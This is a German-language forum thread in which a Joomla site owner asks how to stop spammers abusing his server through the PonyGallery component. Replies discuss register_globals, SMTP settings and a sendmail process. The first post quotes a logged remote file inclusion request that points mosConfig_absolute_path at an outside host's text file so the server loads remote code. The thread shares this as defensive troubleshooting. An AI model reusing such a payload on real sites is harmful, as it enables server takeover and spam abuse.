+ Antworten
Ergebnis 1 bis 7 von 7

Thema: Spam über PonyGallerie

  1. #1
    Neu an Board
    Registriert seit
    16.02.2006
    Beiträge
    6
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Spam über PonyGallerie

    Hallo Leute,

    ich bin momentan am verzeweifeln. Ständig wird mein Server missbraucht, um Spams zu verschicken. Gestern war es der Hammer. 10.000 Mails innerhalb von wenigen Stunden.

    Ich habe gesehen, dass anscheinend die PonyGallerie Ziel der leider erfolgreichen Attacken ist. Ich verwende Joomla 1.0.15 und PonyGallery ML 2.5.1 BUILD 20080226.

    Exemplarisch hier ein Aufruf, der lieben Spammer:
    Code:
    http://www.xxx.de/index.php?option=com_ponygallery&Itemid=28&func=detail&id=100/index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://grelou666.cfun.fr/dz.txt?
    Dabei kam der Aufruf von IP 82.24.79.56. Vorige Tage war es ein Server aus Nigeria :-)

    Habt Ihr bitte eine Idee, wie ich mich gegen derartige Angriffe schützen kann? Als Reaktion auf die Angriffe Firewall-Regeln oder Apache-Deny´s für die IP´s einpflegen ist momentan dass, was ich als "Waffe" habe, das kann aber nicht alles sein!

    Gruß

    Peter

  2. #2
    Gehört zum Inventar Avatar von deejey
    Registriert seit
    22.04.2006
    Ort
    HH
    Beiträge
    9.309
    Bedankte sich
    509
    Erhielt 1.791 Danksagungen
    in 1.583 Beiträgen

    Standard

    prüfe über systeminfo nach, ob register_globals off ist, wenn nicht, setze es auf off
    Kein Support über PM; Ignoriermodus aktiv bei "dringend", "schnell", "eilt", denn: Zeit ist relativ

  3. #3
    Neu an Board
    Registriert seit
    16.02.2006
    Beiträge
    6
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Ist leider schon auf "off".

  4. #4
    War schon öfter hier
    Registriert seit
    07.07.2005
    Ort
    bei Kaiserslautern
    Beiträge
    153
    Bedankte sich
    6
    Erhielt 12 Danksagungen
    in 12 Beiträgen

    Standard

    Zitat Zitat von deejey Beitrag anzeigen
    prüfe über systeminfo nach, ob register_globals off ist, wenn nicht, setze es auf off
    weißt du überhaupt, für was diese Funktion gut ist.

    Weil dein Vorschlag wäre äquivalent zu. "Meine Bremse am Auto geht nimmer? Prüf mal die Batterie!"

    @boxer

    wenn es wirklich 10000 innerhalb weniger Stunden waren, ist es sehr unwahrscheinlich, dass die PHP Mail Funktion verwendet wurde. 10000 Mails in dieser kurzen Zeit, würden selbst einen sehr leistungsfähigen Root-Server lahmlegen bzw überfordern.

    Wäre es nicht möglich, dass evtl. (d)ein SMTP Dienst deines Servers direkt befallen ist?

  5. #5
    Gehört zum Inventar Avatar von deejey
    Registriert seit
    22.04.2006
    Ort
    HH
    Beiträge
    9.309
    Bedankte sich
    509
    Erhielt 1.791 Danksagungen
    in 1.583 Beiträgen

    Standard

    Zitat Zitat von shadow3010 Beitrag anzeigen
    weißt du überhaupt, für was diese Funktion gut ist.
    nein, nur du weißt es
    Kein Support über PM; Ignoriermodus aktiv bei "dringend", "schnell", "eilt", denn: Zeit ist relativ

  6. #6
    War schon öfter hier
    Registriert seit
    07.07.2005
    Ort
    bei Kaiserslautern
    Beiträge
    153
    Bedankte sich
    6
    Erhielt 12 Danksagungen
    in 12 Beiträgen

    Standard

    dann kannste dich ja mal reinlesen

    http://de3.php.net/register_globals

  7. #7
    Neu an Board
    Registriert seit
    16.02.2006
    Beiträge
    6
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Hallo Leute,

    vielen Dank, dass Ihr Euch mit meinem Problem beschäftigt.

    @shadow3010: Die Zahl stimmt schon. Wie die das genau gemacht haben, entzieht sich immer noch meiner Kenntnis. Wie ich ja in meinem Posting geschrieben habe, haben die eine PHP-Seite auf einem fremden Rechner benutzt. Nach meinen Recherchen ist das ein Massmailer.
    Ich habe jeweils zum Zeitpunkt der "Angriffe" gesehen, dass mein "Apache"-User einen Sendmail-Prozess gestartet hatte. Dieser verschwand auch immer artig, wenn ich meinen httpd durchgestartet habe.
    Code:
    apache   28439  0.0  0.4  5952 2340 ?        S    Oct28   0:00 /usr/sbin/sendmail -t -i
    Ich habe kurz nach meinemn ersten Posting 2 Aktivitäten durchgeführt:

    1.) Ich habe in Joomla die Mailfunktionalität in der Global Configuration von "PHP Mailfunction" auf "SMTP-Server" umgestellt.
    2.) Ich habe die "Artio JoomSEF" 2.1.1 deaktiviert, nachdem ich gesehen habe, dass diese wohl als unsicher gillt.

    Seither habe ich keinen Angriff mehr verzeichnen können. So eine Ruhe vor dem Sturm hatte ich allerdings vor einer Woche schon mal und ich wage nicht zu sagen, ob ich mit meinen Aktionen Erfolg gehabt habe.

    Also nochmals, vielen Dank, dass Ihr Euch mit meinem Problem beschäftigt. Ich bin für jeden Hinweis dankbar.

    Gruß

    Peter

+ Antworten

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein